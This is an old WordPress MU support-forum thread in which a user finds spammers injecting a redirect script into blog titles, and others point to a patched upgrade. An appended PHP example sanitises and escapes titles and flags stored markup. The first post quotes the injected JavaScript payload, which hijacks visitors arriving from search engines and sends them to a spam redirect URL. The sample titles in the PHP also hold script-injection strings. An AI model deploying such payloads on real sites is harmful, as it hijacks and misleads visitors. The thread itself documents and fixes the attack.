
People adding scripts into the title of the blogs (4 posts)

  1. Scytle
    Member
    Posted 16 years ago #

    I visited my site today to learn that spammers are actually starting to add scripts into the titles of blogs, that of all things feature redirects, so if you type in the URL of my site you end up at another site.

    Below is the script in question. I have crippled it by taking out some of the tags, but you get the idea. Note the double at the start, I think this is what allows them to do this.

    '<scrpt type=”text/javascript” language=”javascript”>r=document.referrer;u=document.URL;t=”";se=”unknown”;k=”blog+hosting”;function a(c,d,e){if(r.indexOf(c)!=-1){t=d;se=e;}}a(”google.”,”q”,”google”);a(”msn.”,”q”,”msn”);a(”yahoo.”,”p”,”yahoo”);a(”altavista.”,”q”,”altavista”);a(”aol.”,”query”,”aol”);a(”ask.”,”q”,”ask”);a(”eureka.com.”,”q”,”eureka.com”);a(”lycos.com.”,”query”,”lycos”);a(”hotbot.com.”,”MT”,”hotbot”);a(”infoseek.com.”,”qt”,”infoseek.com”);a(”webcrawler.”,”searchText”,”webcrawler”);a(”excite.”,”search”,”excite”);a(”netscape.com.”,”search”,”netscape”);a(”mamma.com.”,”query”,”mamma”);a(”alltheweb.com.”,”query”,”alltheweb.com”);a(”northernlight.com.”,”qr”,”northernlight.com”);a(”seznam.cz.”,”q”,”seznam.cz”);if(t.length&&((q=r.indexOf(”?”+t+”=”))!=-1||(q=r.indexOf(”&”+t+”=”))!=-1))k=r.substring(q+2+t.length).split(”&”)[0];g=”http://www.specialsuggestion.com/rl_tds.php?ct=qUt%2Fq64k9OO3bCjvSgJ8blnCw3hrYMppfmIK29Majy0%3D&query_a=”+k+”&url_tb=http://www.find.fm/search.php?aid=1479&keyword=”+k;window.location=g;document.location=g;location.href=g;</scrpt>'

    I looked around and found this thread, which seems to help, but was wondering if anything further has been done to keep people from being able to enter HTML and scripts into blog titles.

  2. drmiketemp
    Member
    Posted 16 years ago #

    I think you mean this thread, and I would make sure that you upgrade ASAP. Donncha released a new version that should take care of the issue.

  3. Scytle
    Member
    Posted 16 years ago #

    So perhaps I am missing something, but when I download the new version of that file and then replace it, I just get a white screen when I visit the site (any page from the site).

    The source code for these pages is completely blank, leading me to think something very early on is wrong.

    I assumed (and you know where that gets you) that you simply download the new file from here

    http://trac.mu.wordpress.org/browser/trunk/wp-includes/wpmu-functions.php?rev=1045

    then replace the old one with this one, yes?

  4. donncha
    Key Master
    Posted 16 years ago #

    Just download the very latest wpmu-functions.php, not the version from [1045]. Read this for more: http://ocaoimh.ie/2007/09/10/wordpress-mu-125/
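
The following is an added example, not code from this thread or from WordPress MU: plain PHP showing the kind of handling asked about in the first post, reducing a submitted blog title to plain text before it is stored, escaping it on output, and flagging already-stored titles that contain markup. The function names and sample titles are assumptions constructed for illustration, and the mbstring extension is assumed to be available.

```php
<?php
// Added example: generic PHP, not the WordPress MU patch. All names are hypothetical.

/** Reduce a user-supplied blog title to plain text before it is stored. */
function clean_blog_title(string $raw, int $maxLen = 100): string
{
    // Decode entities first so an encoded "&lt;script&gt;" is treated as markup too.
    $text = html_entity_decode($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // Drop script/style elements together with their bodies, then any remaining tags.
    $text = preg_replace('#<(script|style)\b[^>]*>.*?</\1\s*>#is', '', $text) ?? '';
    $text = strip_tags($text);
    // Replace control characters and collapse runs of whitespace.
    $text = preg_replace('/[\x00-\x1F\x7F]+/', ' ', $text) ?? '';
    $text = trim(preg_replace('/\s+/', ' ', $text) ?? '');
    return mb_substr($text, 0, $maxLen, 'UTF-8');
}

/** Escape a stored title at output time, even if it was cleaned on input. */
function render_blog_title(string $stored): string
{
    return htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Audit helper: true when an already-stored title still contains markup. */
function title_has_markup(string $stored): bool
{
    $decoded = html_entity_decode($stored, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return $decoded !== strip_tags($decoded);
}

// Constructed sample titles (not taken from any real site).
$titles = [
    'Garden notes',
    'My blog<script>window.location="https://example.invalid/"</script>',
    '&lt;script&gt;alert(1)&lt;/script&gt;Travel diary',
    'Tom & Jerry "fan" page',
];

foreach ($titles as $title) {
    printf(
        "%-5s stored=[%s] html=[%s]\n",
        title_has_markup($title) ? 'FLAG' : 'ok',
        clean_blog_title($title),
        render_blog_title(clean_blog_title($title))
    );
}
```

Running `title_has_markup()` over the titles already in the database shows which existing blogs need cleaning after the upgrade, since a fix applied at signup does not change titles stored earlier.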
